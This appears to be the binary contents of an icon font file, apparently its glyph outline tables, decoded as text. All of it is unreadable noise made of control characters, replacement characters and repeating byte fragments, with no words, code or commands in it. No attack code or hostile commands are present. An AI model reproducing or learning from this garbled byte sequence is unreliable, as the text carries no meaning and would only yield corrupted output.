6@B'TE@/:
1#-Q3%5D	*2=_)
8">+4_VI.dB-6b;.P
4#$5	�>_$H9	9 ;*4"L#Z%K;5+R3&=�Z5�#JD
A28
�j�R(IZ`r|%3276?6'&'&';276? 676767676'&'&'.??676746?#7"+"37372>'&>'&'K3$-(2'
#B�P ��0# #
"!�.!
;�
df`
!1 �
�7LP30
2.1?BJ�',<>F@

2!% '(<5&"(!�/30&
>#-��-X O���i�R=��"&462"'&'&'&'&#"76767676232767676?'&'&'&'&'&#76767676?6?&'&/7#&'&7'#"/q1D21F0y43*06H&>90+$ 		%,k9"C51-7:1-'#
')3w&-6? 6.97
"��
	�
+'(h

w2&"(Bx���#12D10�

'	

	%



C
#
!TT	D3-C ��
;(."M9(*E<#
H wi������)Q>7>'&'&&'&&6767676?76&'&/&'&'&�(�z;''P��A%,
=| w�(
`@z
P(	C�U
	


+T
�!B"&n�F2d(
,.
&�b (*R!��"
a#�%
%z�%
�����3Fg{������%67676'&'&'&76'#'.'&'&'&'&7>76323&'&'&'#&'&'.376767>&+&"&56'46;2454&'&'&#7265&'&#"&56'46;2676=4'&'&"'"54&'>7656'54&+&%"#"474&\B&	!61K^82
&&2!'*,EV�G
	
,*'�62.;/	~d:1$!�|(	���/;
`6!$1 :c~	t)|��
�
	
����'L]f)";'*;4Wds/ &

�@g
56
15
�

)
	�
@GI(@@	
)

G@

+M(�8c		&&b\
#=4
����A]ir~�����%67676'.'&'&"&'.'&'&#'#363>'&676%&"'&765'&7673767&>..62%&>..>'3727>'&6%&6'454'&>.767&� 
"-51%	
	7-)
B�c AH#$	��[]*=(�)=7+0/++<++��)<8*0.*)<,+

	�		
��	�1++
!	
0'J0%E))				
t9U=/60�+<++;+�9T=/6/�*=*+;,�

=
!?		%
	
	
	�j�R,aq#"'&/&'&#"7'6763232?'"/&'&#&#"''676?'6322'327767673'&#"'76762?#/�@$ "./0f]D9
PK'&91# "Tb� +#&&+%)54AD5P[$%""!
!
$��"3H(9
D&R7	
	$+��� 	+
�
	�
�6�
�!�

�
�	�
�y��	Q������n��3BU&'&'&/&"#&'&/&'.'"'&7676?6776756?7654/&76?767676764"#&#"/4767676'&'.&'&5&7>767636/&676#'&&'&+'&/.'&/26'&/6767/&'&#"&7>76&'&?676&'#".?676?>76767&'&'6?>67676&'"767�'.V*{=!3!j+"1 5R.4	,8'=$7R1��

	
	
&!
,
	.	"3

4
	
	*1$

	#	#"3#�	+ (7#G		�m
c�_	4
^��&-

>	�
 B/��		
/	?^�

N	d


<"	<
_
{	k(L4'
3* ^	. 0
7	r
$-	0?!	l_
	B 	�%,-%6�	8n	����8ERby����%&'&'>7'>7'&'&67631&'&/&'&7676"2>4.".4>2"276754.>&/767.76?6&'&'&76?6?6&4'.7676&7&>&#*2
@4Y_d
@�7ne��<(82=V4(,%,4+%)
��BpAAp�pBApE4W34WgZ56Y=#)2L


		K""6
�		�	"	
		

�
P-%L019sK�=Mou@
	An�qD@q�qA�J5XhY54ZhZ48+
4%

		5	* %
> 
%!
	

�


�^TRah{���X����).&'&'&'&'&/&/&'"'&5'&''&#'&=&74'&'&&'&76&767>&74747'.56'54>&756'46456'&70'&"'&'&'.6?6767626'&%7676?476767675'&'&'&5476/&'4#&'&64'#&"5&'&'&'.'"=&547#&6?"/54''"'&"73?67366'5&5&?6?>762;2657'&/&'&/./&'&&##72767274#/&775676'6&'.'&56776'6'&'676676'&632?6766'&#"674'4&"'&7R		!(

	
	


+<`��d?�q�
�
P
�

K
%
/1
	��"
,*-
		
		/,	
!.'$	!�	
	
	
I#
=
�=
 bb	*			l�D���q8	


*E�
e
vUVE�g���q8N�F;5QDd,�I+&
'
 "	
'�


!	

23

	
	
		%(3
	*/

	h	n	

	



	f		H
������u�������-&/&//#&'&5#''&'&56'&&'&76'4&""276?76767>=&7'&76727676&&6736?'&/&'476?&'7&#'&54'476276%'.?&74'56'56'463'.'4?7/&'&'&6'77&/&'&7%76?676?676674'&/&"'&'�I��
		

	
	$	�	:D	 

HUCZD1	!
4B��	0*		)P��j	

b	
�D
,5!6^/3Dk���	
"!
		4		;
=|
	
��\
��`�m		�	BS
��o�J
BJ^	'Q&	 E'�	�hm�l�l$��
�(��?
$>-	N(>9Y	��!
	



5&>


�jfRU]aenr����%>5326=&'&'&/#"26=3#5##65326=&'&'&/#"26=3#!5%53#6#3#353#>#53#5##3#3#?>54&#">3232767>4.'>54.'&#"6762+32"/&'"264&"53265764&#'&"26'264&"264&"

	
S


V�S


	
T

O�'w����Ӎ
$l���$	
%%`�_4

 
x�



		



�&
p
H�Ho�""g+_f
	
f
_���+`

g
	
g_����N����
���������wm.
	
 
	
	

h&&�s��9sHHr��
�""9""���r��	'&476767&'&'&'&'72?6'&'&7676'&'&'&/?676'"/?62'&/&6?6'&?66?66767'&'&%4&'&7>5''&#"=6'&"&76&#76.#"&6&"&5&6=4>;6'&2>'&226'&67&'67645&6763&�BBLU
64!
	

$0&


379	+"
		$	
& #% =
 *
	'-=7-(/D?7���
��&	



�*$$��0.��$ 2#$#
&5C(.

&	 
4"
  





%*$�EE�FEe

			
	
	

	

	�$	"� `

�����0n��-%&'&'&76?676'&'&'&'&'&/&'&>7676736327>54'&?47>767676?67>%'"&7672+'&5&75466'54&'&'&'&75>76767672'"#'#7546276'54&/&"/.75&676#'&6767>676'&'&'&1&76'54&�
'��	A"$<o.	

'6
)
	p� :	0��			
 

(<

&(		

$	
�;Q#*	
	!#)
%9d,�R
<
	D}		
%&&

OK1!Y	 S


	
 

	
J
			(%5%�
*G$6
	'1."$,	 
=O&
���i�S�)7.'&'&"/&'&'&'&'&'&'.'&'&/.'.'&767$6&'&'27>7676'&'&>7>'&'&'&67676'1&'&67>'&'&/&'&6767676'&/&'&6767676'&'.'&'&6?676'&'&'.?'&'&'&#"76'&'&�
		

	




	

	
	


	3+�
A���

		




	
	
	
	��v&*#09�g�!,$198
�
						





			

		
	
$(	��y>
A���	


&	
	


	


	

q�$	
�� �h>2%-U
��<0"*�j�R2>FKOS+"&/#!"&46;'&7676?'.6?632'264&#"2?#!!47!!!!���V��͎�f���
*&��,<<,00� 
"ي���$��:�?��b�Hd�
"�y]&!*vG��=W<080�/
!��*�*�*�j�R04Q264&"&'32?53265'&5764&"!'&"2&'$4767676326'&	&55K55QcA&+'�i�y�� ��� ��QEU�¨6!o
-Kl�yGE&#-�6J54L5��9���.��]���
]-� �� �hI"2�N0&$		ZG7$3�j�Ter&'&'&"&/&'&>76?67676?6"'&/&'.3?>/.".76?6?.>�
z42C!$$H'5 #'L\/
M
")/1+(l'74$ "D�/O8n	2 +!D%�$;F9%=B8 
B!_@U+-#!-\)
�'
>D"w;bL"4',�
�G&0�$	(�$: &=D7%:�j�R/?O}��;2;265463!2;26546;2654&#!"!"&5463!2!"3!2654&+";2+"&=46;26=4&+"&46;2326=4&+"72+";26=4&""&=4&+"3_ <
�<
'
��
�m�3��
J
CR	nC
Rd�SSv
p
4?��
��
T
��d9����9
���y� 	O
E		dH
'�
�j�R5W462"&2?73276&/57654'&"'76'&'&/'%76'&'4/%32767'&1E01D1�v@\�

�$ u:)%�!6)��ԯ��(���g%(+!"%%�#00F11
�:O
}	
"q%	c)t
	..����rs4/M
��>�>!���-R�32767676232767>="'&'&'&'&'&'&/#"'&/&'&'&#"&'&5%5676'&'&#"#"'&'676763276767676329 	!	
!*JNE?9GvmbZPH?80(!Ss�� *24<9"(!�	


			#)B!"+2!EK$;)1[(1+4*6=(1%';^,N>9A	
&*#.)Z�




y#l !2#'3A�5/'#
	�%>A<C'-

	@!B#			
LGK����&*.7@Hb7"3!2>4&'6'&'&#!'#?67635"##53#53+532!'#"&463'.#!'&'&/&3!�32d2:	��a*	#Yp0
�:��Ԫ��0#II"1�	�<uJ"11"���

6
8	
*8�2;22;0�>�	
	#32
�b����R"1�0(0G��1D0�
)

)���i�S->LZe& 7676'&'&67&'.'&'.&'&676'&'7".54>2&76'5467>.��urCECBqtuqBDCApt�p�x�9QTHH"e@��7}�
	�!9! 6>8 !4l�~5��+9:(.9<RDBqt��uqCEBAqsurBE���lh			�I�|~'
� 8!6 !8<6!�	
�~��>,'88X9�j�R&Zm535#3'7'72767654'&'&54&"&'&'&'3264&+67676726=#";47654&"327' �PJF9>
6?>hm�mh>?87_a�bSQ22BB22QSbbTQ13CC31QTQ QP+55#"8>?LOU~li>??>il~wge?A��EE31QTbbTQ13II31QTbbTQ13o!FF,�i�R?M]aq{������&&'&/&'&;276765&7676?6?67676&'&>!"3!2654&!!326=4&+"'2654&"72"&462654'1>54&"7462&"&46#576764&"6237135#+
719I-		"*L+&�Y0.-�

�

���+J(%

^=	
)

W=�	/R,&*2$C4@!72;<.
B>5=%L5
"
j(/-/53
��

-
��-����(%#!$%C%86Z	
-	

	/

!

xx���I/.6%>.'&'&'&'&'&6767627>7676�OV-#�`'$

j�=�&-UM-U�0"7H$#$YLaR*G4	29=>;E;F!'$]M3*)
A	)�0�'�_
UM-UM:X"$(	
!8#KLA)+

!$
 &-(�j�_!&'&7>76'&7'264&"dIdaad��daad��hY�Yo8N88N�I�d`ad��d`ad�SY�Y�N88N9�hZR.?DU����,�676'6&'.'&##7676726#'/&'674'&"'&77276766&'&#"&'.'&'&'&&'&'5.776767>%&'&=&?>?6?62#.'.76767>7626?>7&=4'.'&/.62'"#4367676?&'&&76776'6&'7676?476?675&'&'&5&?6/&'4#&'5&6.#'4'&'.'&=&547#&6?"/4''"5&"2?673676/&76767676767672;2657'&'&'&/.&/&'&76366'&6
	

	
)
	 1	D4#*$  $*#4$-#1^::^1#-$�Z	*),%('
S-�LL�.E>9<9>E#
'('$,)*	�
	
��
	
!.*/
	
	
	
	
	 0(%"	J	

u
(		J�	��no*	//	*on	
	

	
	 5k)-			0+vzA�OO�A<v+0			-)k5�


	

�

	


  


	
43
		
		%*% 
!	)0
	0	
	
�`YR'6Z|[v������%#'.'&/&&/.767>'&7''.'&>;2%676?67>'.>&56%&'&'&'&'&'&>54'676?476?675&'&'&5&?6/&'4#&'5&6.#&/&'#'.'&=547#&6?".'/&"732?3676765'&76?6?6767672732657'&/&'&/./&'&'&#"#7676?24&/&7?676'6=&'.'&56776'76'&'676676'&"63?66'&#"674'&"'#&7	 ' A	&Y(&3D06��kF
	X	
��(")/)'
	�#&&	
;&8��#.W

	

		

	3)$	"	�			
		J>

�
9	 �(*

%%	CQl6		)k	
07	
		
)&G$L	
L�)

		3!"wF	0`�0 

61
	


' 
$ 

'0	
g	o	

		
	
	

	h


I�jCR^bp|�264&"&'&'&/#&'&'6'&'0'&'&'&31223277265'732657>7%'5%.676&&'6767"'3~#22F22��">
"
4
 #	 &&(''M(B/����Q" 15�	T�2F22F2w 
		*-:=!.����P*
"XB<51 51!$

�j�R)767>767&'.'&&'.'&'&'.'&�VMQ~%$^\_�0.VMQ~&#]]_�0.$&�ZV^*+�UQ�j$&�ZV^*+�TRP#&~QMV.0�_]]$%~QMV.0�_\�{^VZ�&$RQU�+*)^VZ�&$RRT�+*�jZRJ]4>2#"&6?#"6%.#5#'./26=4/732?37>326?6?'&'&�0800+=�"!	(($&2(*thhO	"�"
b-Sj*��P
P#
�0080=��to1,,"	�*::k	��+!q��
~�V5��l
!����	:�j�R5>JNW[4735!3';";#!5#'3264&+6732767676?&'&01&'&'7#5676?!!�'��(�%,5?7)5(7


?5-$��|	$VA&�+!(��$	{&A�M��h�2 R!#*)8*6#

����
#6*8)*# !9>B2
g<�1a��Y-�y��p2B>9!_<g��5���+=FO232767676767676?#7!#;";#!5#3264&+63676%3&'&�1-)$ 
����

 $)-1	

CAD	

	��!3Ok,!�#�!,kO3�"&%%&"

��ZZb

geEj
>QLFFLQ>
jE	�����AMZot����%+'".6762;27676'56'4?62&'&'&'&'&/2#".5462".5466?6/&'&7"4/&'&6?6'676&/&'&/.76'.$BX,0
�

Y�K '�F	@B		�].#D3b(99(-910:1>mG)�
%#
!!X	�CD
%2C!�
V�K(�GB@	
	�3]/"E38P:-)8�2:01->�n�'F %]	#

!f
V
���%7D^v���"76764'&'&&'&''4>'&'&'&76'>&67676&'&'&76?676'&'&67676?676#"76767627#7"'&'&'&'&'&'&?676676'&'637&'&'&'&''&/&'&'&''"'#&'&/'&'&6�UJI+-+*HJ�LI+,,*GI�&((o�E
%.L7vB
 	<X#�	(-JD

&&	EU
!7Y	
	M3'	L+.�;#�	;�		
598%&

��

	-:D 7%.%!-9,%1,`	&		?)%;7�M--**GI�KI,-,+IK�JH*,�4 ,-EH_4^8�V�!{P!.
8
4P�5
		_	+/,
N			&
"
j�q96DG7h	



(9M	%<2Izj^X
!
84a\Um`����j�R-@Tg{�&#"32>76'&'&'&/7676763%>32'&/6?'&'&/'&'.'&/76'&/76?776'&/76;�NPj��" Y�_NPj��"+VY 	�jI1;*%8I_r�$.i5C?'*pZF4�1/Dl	]QzO�
66Nz%"XyUY
�8;'+@
$� 9C
8V�e^ų� V�e���cf�%.5&7? -#P	1%5IF�G5uQv9;	<Y��<3+
kIEH6.�B.3!GJa^-	>OpW5/$+WP=4
g�j�R&&'&'5#3#!5#5355!3#!#5356�J/?qx,y8,=!u��22,22��0G.KK.#C�[�\�>�\l����~�?&/q"267654'347676765".4>2'"264&%#67>'&/726=?37?>&#54&"'.";26&�J@>II~�~%%s%&��%@%%@J@%%?&+<<V=<��.0d
AQ
	N1|	
]1`]x&!*.u
�%%~�~II>@J#,
`�d%@K?%%?K@%�=V<<W<� %	��	I|	
G�
U�	
�
1.������`6'.76?>76?6&'&.7676&'&/&&/&'&7676?6�ME
	&6*�55%+ST4�>//B)
0
	<	>)
BL#5,RGB�Br%
@{��0�@
	�� D:6 )TS4&)C#2d	"D

9�J
#&#5EA�AT*$"R&K�V�j�R<EN264/77676?'7'&"&'7'7!%'676&76�
!+;1;/3$#q
��q
+
."W3�38
���{QHA`@8<7��Q/	

	+
p	Rq#$3/;1:+ 
;3�3S��y�Q#	0
�Q+9;8?`B����)>P!#"3!26751"5.&'!3!27675&!3276?5"5.#!!#3!26?5.���
	-A
�Z�
�H��m��	

*
:I

U
�DT��	T
N
��FT����'8J!#"3!2675"5.&'!3!27675&!32675.#!!#3!27675.M��
-}
�Z�
�-��m3��
+:IU
�DT��U
O
��FT����(9K!32#!"&'525>67!#!"'&'56!#"&'5>3!!3#!"'&'5>�)

��}��`
��	���$	��:I

U
�DT��U
O
��FT�r,X4' 7#.'&+3'&"526765#"#6%4' 7#&'.+3'&"52>5#"#6GSF'#
/L1K+% $GSF4%
.M1K+% $�6OBC*?O�C!
 �&#D!6OO6!?(&!�C!
 �&#D�j�R+9E#'&#"567>54'&'&'532?2'654'&#"323254&+Q"$]�yhb2�@2	2@�O.`o�N;A?_�o%!#G'$<\�)+�o{<I&46=W|?34�39bC5b)'OAfk4414���7�ot��2���i�UZ��%&'.76?67'&'&'.?65&/&'&?67'&/&'&67676?676/.7676?'&4?6767676?676766&"26�
-

		
$
)

	
	
$NN
	
	!)8$$
Xzh"��


%!	
36"F+K-p 	$	

	+

		
	7C
��


'0EJ
$
,-�5(
LB+5

QW,8%F,
�j{S8Fh{���������4'&'#36232#&#!"&56'46326'5#3!>523265&75!36'54&+"3!2654&+"#!"&"#"&745&6!27#!"&=>3!2%&633272#!"&767!2#!"&=4>6272/+"&745&"&462'462.7"&4627"&=46;2'2".6{ �Sf��}�#
/y)�璑��,K I�����#��	
$��4id2
����


�a.\�G
 

�#<x�4�
C-/0`�?"*<-�
��6����
	~	�
���h�v��7I&4?676.6&'&%&/.676?64%32676?676&l�
!
��R#G�'�H_0�F!

��m
�IT
W�
"
��R#
I�(�H`/�G!
�%�
�$ 
��! �����?[/.466767''.76767676756'&#'.2764%674#&76;67676�Q8T�
&%
SHK#:/z[h
_M�(!oF���#�B^E2 +
!	%+(	lJ0

&
K%&-\����
�#*66
-'.O�j�Wf�#"'&/&#'&'.""#'./&/576?>?6?6764'&'.7>676?6764/&72?6?6276?656��E~

��

	
	�4
!@0%"?,	��0

WY��72&



��&�6~
($��
	
-+	�
) A0.��0
YW��72&


	��j�R.<J�&/&#!"3!2656232&#&4##%'"5463!2''!".63!2''!.543!2%454'&'&#!3632675463!2;6+"327267�'<
�$i��DD-}$��b��			[(��	`GL&�"
�
Q
)
)':
%�
yq��	e
	wX��J&!
		$
��
+	�j�R1fv���&/&#!"3!26574 !#"&5463!2;2454'&'&#!732675463!2;6+"32727%&#!"33!2726'"#";32726&'&'+"3!26&%6364+"�'<
�$iI����P�L&�" 
�
Q
(����%$��	�m.��c��-�)':
%�
�����I
I��l7͞�J&!9		$
��
+	|w`����,5?Yu~7>'&67%6?675&'&'&72>..>%767675/&'&'&'&/&76.76?6%462.�!2S��16C#(,5 ?%<-9475'+.$



�� ,.>--X
!H$<2le F"b�		��#M-N
'++1*��->.->->1B!t0>	##!	J)'<
"	


�.?,/!+�' 2
"B;--Q,I$D

	y ,.>.-���;.@Xl}�������,AWq��&'&#!"363!2767676?67>7>?5'&>73&/&46762'&'&'&6'"/&'.76?>7&4?>"'&/&'&4767>'6?3/&4''&5'367>'&/&4&5'&'7&'4&?6762"'.'#&'&'4'4767&'&'.?6?&'&#&'&476767&/.?67&7&/&476?67/&'&4?67627'1"5.>77&'&'&6?67>7&'&?3�

��
	f
/0�	>
6	�6s	DOv'&##4##QfPQRU$T"('�	rHB ]/	3&%D)'
66u6	#PQ5�	'%4$RP#�


 	"
6$%

')P
  3)a
		��G+"K B*Ct9a
�		DP��&'#$4#$$QOQQ#S#'(
		HB `X	
52&%D')	�		�266
�-6&	$OQ5)%'4(#RN$)
�16#&?	^)'P6  +�f�Y$4EZp6?>/&676?6&'&'&'767>'7676/&6?6&/.'6?676'&/&'&)'(
7
3\��R��h
6U
�B�$%� ���
	

�s���S	�d�
8pW]��
	S��%<{U:�	�%$�!�l�
	
�r���R		�c�j�R 2>&/.676'	&"6764&/.6?62!"3!264&�%�"��/�1((J(ml(��kL(lm(((M!����

	


$
�X#�1(lm(J((�/�M(((ml(M�"�
������8FVj6?67>;2?>;72#&#'&#'"#'&+"#;26'&'";626/&.7747>Z.G_/��2E
	.0�+
�-�S�h *	���Y�
&?~����M4��H	G�	�.��)T�V?A���	>���{�AH67675 '!4767675#"'6325&'&'&5!6 5&'.54�1<��D1��1@��=00=��@1j1D&<1�
	/3��3
	/3�\3/	
1��3/	
.3�3����'6IU7 !3>75&#!"3!27675&'&'!3!2675&#!!#"3!276?5.&?64'!!		��	

�
	�Z
H
��	��n��		�		�VH�TD�
U�xG

T�����jYR#& 767>7654.'7327�'&H��A5
�&%=��Q7�E		32�-	2�D1��5/76&#!";2+"3!26?6&+"&7>;26#�	�	Q|	�	�	Q��ii
	��

j

j

2

����)>O%#!"'&=463!231#!"&'&=46?!#!"&'&=467!231#!"&=467!2�
�d
	�
�`�
�a
�
�c��
	
I
XD	��

G
��
F����)?R.#!"3!276751"3!27675&'&'!!#3!26751"5.!#3!276?5.��c	
�
��

�Z��h
���	

*

I
	
UXT	DgG

T
�TF	T����*>P!#"3!276751"5.&'!3!27675&!#3!2675'.!#3!27675.��h	
�
	�Z�
#�h
��m��

*:I
	
U
�DT�G

T
�TFT����)>P!32#!"&'5305>67!#!"'&'56!3#!"'&'57>!3#!"'&'5>(��c��`
#��a�$	��:I


U
�DT�G
	T
�TFT���t�H)Pcz��.?676?676?54&'&'&'&?676&'&676?6&%676?64&'1326'&/&3%6747676&'&#"'67&/.�o�Dy$#MH$'R9
>R@
1�Z�]$�N'3l	(�#Fnh@)P��
&+P�	' �&M
�
	
	+
 "%	�*?d"<Dm&A	#	*'AP",#j1d
��!� 

P6w/
�&08G.YB+W"1E)	U�
6(�(�
o0�*�W^
,		�"����&5HT% !#.'563!2#!"'&'56767!#!"&'563!!32#!"'&/5>6/&47���		F	
�a
	�
��	
G	�E��c�		�		�VH
�TD�
U�wG
T�����g�Ra'.'&676?66?676'.'&76?62&'&'&/56=676767>7� 6`@	oTS*Jc1<	 AA'`+&7n6=
:,R>��aC<.P?
	@UE{)+H,|8U R	A_6�nTU)HE3*K!AB'a+'7m8@W+6
>��aCY,7	=	

-:68GkK,{8�j�R;+"&54&'.'&>763!2#'"+"&54&#'"�DrL0jG1=�12	�$$
�sWHqDJ�k�=x[�s�#7n�i:R")6?&"2>'&'&".>;2"2>4..>-9R@>Z���Y>@�<e<:e<<e:<e�98�I�C-K,,LZM-.L+/L54JM��HH��MJ45��;eyg==gye;YM��p�,LZM.-MZM,�,,���+(;F[���!2#""&=4&#!"+&5>312736=4&#!"3'"3>54&232#!"&56'5463"#'"&'&75463763!26546;2#'232#!"&=6'&6;'2;2#&!"&=6&637��	
F#	�S|�g
��

e[����	Z�4h4	�/"�TT
���RQ
	(��&KK

��	�>/#\`

6"�<-	�hS�~:�;]���


	�
�i�T="#&"'&'&'&767676737'&'&>.76?&U"C"(&;:_E!,.!�kG
8`�"C*?0=!@i11,`�"��k,A-eC[X]`P�> ?.�� Ai1-^�����B{#.676767>76&'&#&#&/&476?6?333&'.>.76?&#'&'.67672";2�Ni9"	3?

!,(R("-�-XB		8w)!s,��. $
*B/,WB,".%8mF(.3Nm! 2D
+*mA
6T/,#@26[!(-!�,YB!&	8-��.$ 
*B0+XB!.,
b:��0I!. Mh_�j�S2Mez��4546;763$26'&74'&767636!"&5362765&756&%&36'#&'&76'&676""'&6763%2'&2;2'$"&75676332376+&#"'&4767'4)R�

3/'&��,(�m�H	����P�*.	
2ڢR
�@�7xx
���A�@5j5��7o\��3&&�%ff	

4.	�%'),��Vl�k��
0/EW�+	)H-
�00��'S4' 7#.+'"5>765#"#64'27#&'.+3&"5276765#"#6V�U,@-'-�Y5.&-?-iJ�J

.4�1,
FZZF( O[(��)")'[P �1881!0"��


	`"0���845!323&547 '367676;!!#6325"'.5�AX!
l��l	#*/?�h�
!;�fi�:!??�8B@p06a��[?'q@D�e?��6	

	37#
����#5Ha�����!#"3!>75.&'!3!2675&!#3!27675.!#"3!27675.##2?67>7#35#&"3267;75"/&=4&">32#"&463."5#35327676764&"./5>32"&/&'&4?676?6327."32767'�=
�	�

�
�<	
�	
�@

��m(
`


	2	



"
	
	
CH	

V
�LS�N
	T
�MF	T|$)##�		
"


		�	=�
		.
�
		����X�67>;2+"7372#&"'&'&'#&"&56'463737676&'&'&+"&56'46;2"#&"&'&7676?6?676.'&"/&7676;26'56&636#&(J$�? 5|	II 3i	JK'P,C	G�*-.#F#
7

1(<7NC6&*	�?#Fx;,-/N&�.-3Q*	�,,;v?d-.FK��^>	
(,5G
&"M


t���T�%"#"/&76763:26=4&#'"&/&#"'"36232+&;2?6?;265&74&4&#&+"&767676?6767676'&'&?6763!265>|&J*
HJn1&n7/*EP'A�
i6,��?�	*!&5DO6$
7
;,�6lY�)P?-.?ev;-+�,VE.-f



&'"'
F	
'&
>]���#'+/37;?CGKOSW!!553#5'#5;#=3+53#53#53#5#5;##5;#73#=373#=3'533#!53�'�fv����ݢ��������������������������������f������n'11�S��������������������������������������h�������(Hir '3>;625&'.5323&547'"'&/&276764&6?6762764'&'."&462\�\5L69���86L5Yp 

4S
6
�
 
	7
5x�gY4!_l0�}0)+/�1k_!4E{�V";�855	
T8	6��<"
77���h>R&Caj3>;#625".5323&547 '&"#336?64'%#'#'76?>&"36/3&4"&462�3G4	11���003H2`�0b6
��
		P��z60
	
O6

	6�/

K[f.��,(,b.hY$.PesB2��
	N

N4	5

�i�R%/>_#!"763>7676&#534'53%3##6?653&'&##"#"&'&+"'&"3!276Ms�
C	!".B�d1>@��87��7

	7-�	79�#!,#E40f.
\Z8)
%i�O�E,!62��G�kס�Rk�J:D/�Kgϯ~_!!!++
03�j�R&*3>76;#625".5323&547 '!!�9((:57���659P9	m��n	d~��,et�T2--2�3td#8RyyR0�K8�j�RD%#"&'&676767>76'&'&#"'&67676?336�m�N.#

FX
y%+%K9V-?����	
F? :,�<�	*KtB&1YE�\W?-��	

-6>� ��]o~��������"#&3:"+"56'4632/4'"&'&'&/&'&'&5&7532726.#&"767>454&+";26'27264&+"3327264&+"3!23674'#""#&3724#&'264+""#&3726'4'"#&;24#&765676&+"454&'#"6?
(%
�
'
				`<�Fl0�==	
H

�		H
��I	u		&%�#D	
f
%$	�
F�Y�4.(	l65	M,(6
	�W60s3;�fL�					
		
		
�q	4'4���G'%&&/&?>/.6?>?>''76?64&"*�
��
T
&
�
\
	u
N8�
�Kv	�);��iT��+Ht

x
���
K
\�;(����@%456'4/&'&76'54&#1"%672674'4/&'&5&5��r('r�o
q	RA!,!�&J
�4�Z-! ** !-Z�4*��
[!!"":4<B�z	��0Bp����7"2>4."&462%26=4/&+"73632763'"&=46;2#6=463!2?6&#!"#!";2;27676#";26=4&.#"2>5'4"&4622?6/.+"/&+"+"+"3�22<22�<�
K(
9R��'��&�B$NAvk
km	m		�:$22<2m�##1:&%,�2<22<2���]�6]r)@:�6T4R3F"6 		 	'"+2<224�;5E'(����@ew��'.+'&'&/&'&##";26=!;2654&/&'7676%05676767;267"'&'&/67#"=476327#"&46;2%+"&5476?62�
$0I#2B�":$


r
�
r

�a
"+KB	k0 )0;�;0)/T<�L

L

7'/
<(}
+�&
.�
��==	�	
	XJZO�w#"






��Res���%7&'&'&467>4&'.'&'&/&#*"3546;2+"&'&'&'.'&5#!767>'"+"&'&7546;27&'&62&&>&&4>"&5#367#�
$" +$�%�A8*A�

�
	
M�

z!W�2
	
T
#1 >
q/.'=80
�~
A+#<B�
*.".%K53�
��

'*k
2 �		|
,X!T*
DH�.26XB�
&2!
�y,=BEKZ"'7#3#735#3&#"2>54&'7332>4.".4>377#>'37".'3'632�.,2g:
�@�D(
3U22UfV2E7�&4Q03V22V�n)ERE((E)$#$+6�Ash��
)#�&A*�h &)E((E�Hw%6N%%�2VfU22U3<`:�/L-2UfV2�)E((ERE)�	�MB_06�ҫ.A%�#<%�)ERE(
�xdhlr�����"';26=4&+&'#3'7264&#'"37#"32>73327757'/654'67672>4.%&'27#".546737#&'67%+"'5&5'3.'6767732#&".54677&'&'&'6329}+D@"3Wb@&

h

%d+4-M.+J/%

+2)-8-M[N-.M�8
.#,�'B&C2�'?��
9	d��
C<'	+4okkK'B&,%

	&B&&B�9+)84X�

NQ1.M-)G+$6,!S3.M--M[M.'[&Tp>&�&A'3O	�$;"�
�
	�
%@*-$0;��K&A')F:0
$(&BMA&��$4�7676=&74'&#";26=4&#";26=4&26=4&+"&=4&+"+;2=46;2+";2;26=4?676;2754/&5&546;26=4&+"&=46;23�$


�oo�ppB�=�6n&!1
	11F&m���`0

	��[
�%%Z$$�rxH%%R	��
	
01bO�D7&$H���[k{��#";+4.#!"#"&=326=4&+";;;26=!;26=>=326=326=4&%463!2#!"&5+"&=46;2+"&=46;25#"'&'&'&'&'&'&/!�(%!9!�j!9!))#U1V$/���������#.7E,&#
%��YN!9""9!��`��j�"95%%3;#�d�b+��111�

	
	
	S��	�T#CTX\f"264&"&462%"264&"&462!";462!4623265.#76..?>;#53#53+532"00D/0!�"00D/0!��'#28P78P8;�{q`ٻ�ػ����0D/0B1uu0D/0B1u�j9p(88((88(9�*5
h��������`$(,<@!";26=35;26=>54&!!#53'"&=463!2#53���-iW�h:�43��>�¸'��2��,O66O,A-?.��G����GG���@NWar�"#'.#&#&"#"7>=!7>=&7476/>=4&2;2+"&>"&462%4632"&54?>;.#"1#'.5>?676r	/&+V��T%.

!+*�*)	
�>=
z
�'':'(�SS3#/(			'*3!'6-9��
6l6Y{'N
��&++$�
	J	 �!?,U))%-.�
	J	
�x(9'':'�#3&�(
%(*7'J����FObk��>.+&"&'.#& #"#&#";7676'&75!;6=6'4/&4>'6?67>3732"&462#'##5##5##5##5##!%335335335335334'.#&"3{
$,J��K0		
�
!#
�q*
	`��0	)�"0��"hi�'4O--(
(Z�"'#"Ic1E/ �*)�
&A ��))�	N���*:B#54&+5%'%#"#"!4&+"&=4;2+"&=46;2!267!	������	"0�/��������	?*�'*�	�V�T�	0!��s!0������/  ��_v��4+'&'&5&'&/&/&'&'&'&+;;7>'52?;26547467>76/3>%6?>7636$76".62%#&"/&3!2"&>2�
# P)|V (1O('
 !NdceN
+'DL
�N
9<nN,'���� !.  �		
vv
x!!,! �

O=	[		

$.Wf
4 
-$[.[A2
	=K#$��,  ,T
I
_ , , ��Oaqz���'&7>&'&/&/&'&#"3267>723!267>676276%+"&?67676;#"&=46;6"64&"&>2%"264&"&>�	
�	!�)
%%	

 %J!+%
�)�

	"E��F	.�v&&7''%&'6&&/	#
			r	G>9Q&6''7&l#"k&7&&6'k%!�n!6GT]ir&'.'&'&'&>36766%&"#.7676#%'#.=&>"2>5."&462%&2>."&462�+/LDQL�*4Ah?�Z'5(:�`1
8~
&]06()�H
	�\/<0919/,�.;>-21,k#H'#3-9KAVA88>o50(�h#)
))qw;.02.8�- ,�:Y?26/�,  ,����@Ignw.'&'&/.#!";6>56'5463!27>'546;2=6"&>2'"5767>;;2=36+."72#>".>�!
1+��*1B	%!-2�0!@�''5&%�0�$
9$	1=1	Y+�+�&%6('t.
#E<(!!'�2(�
&" 0%'&&Er2(7'(8&�OC
�$$8�%9()7'��
n~��632>&'#"'5/&'&/&'&&'.+"323767#372?6463!2332675467>'#65'4'&'&'&'3%6?6?6!7646362+"=&%+'"=46;2o


&0`0o�'
#


	4�	
-
7���3:��
K
:9

q�
&4
m�""I$)%=^.#H+>
=#0G$9$
��

 
��,5>IR[p}��%#54/.+"#3>2326=.'#"&=46;2"264&"&462%";673"264&"&462##"'3!2654&%"2>4.".4>27"/&=462�E
(j	
��4F3[t�U6M)):))��~<)*9))��
4X4|��.N..N\N..N.$=##=H<##=9

*
��e
��!!..!"�MN
�):)*9)ii"!)9*):)i!4Y4	}P
n.N\N..N\N.��#<H<##<H<#g
T

G
